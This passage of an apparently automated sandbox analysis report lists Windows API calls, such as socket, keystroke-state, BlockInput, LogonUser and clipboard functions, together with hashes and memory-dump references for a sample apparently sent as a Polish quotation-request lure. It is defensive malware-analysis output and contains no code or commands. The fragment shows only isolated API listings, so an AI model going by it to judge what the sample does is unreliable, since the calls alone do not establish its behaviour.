                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4170576061-0
                                                                                                                                                                                                                                                      • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                                                                                                      • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3539004672-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                      • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32 ref: 00477314
                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                                                                                                                                                      • IsIconic.USER32 ref: 0047733F
                                                                                                                                                                                                                                                      • IsZoomed.USER32 ref: 0047734D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                      • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                                      • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                      • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LogonUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1244722697-0
                                                                                                                                                                                                                                                      • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                      • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                      • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                      • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                                                                                                                                                      • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                                                                                                                                                      • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00459800
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 004598DE
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                      • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                      • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                      • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                      • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                      • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                      • API String ID: 541082891-3320066284
                                                                                                                                                                                                                                                      • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                      • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
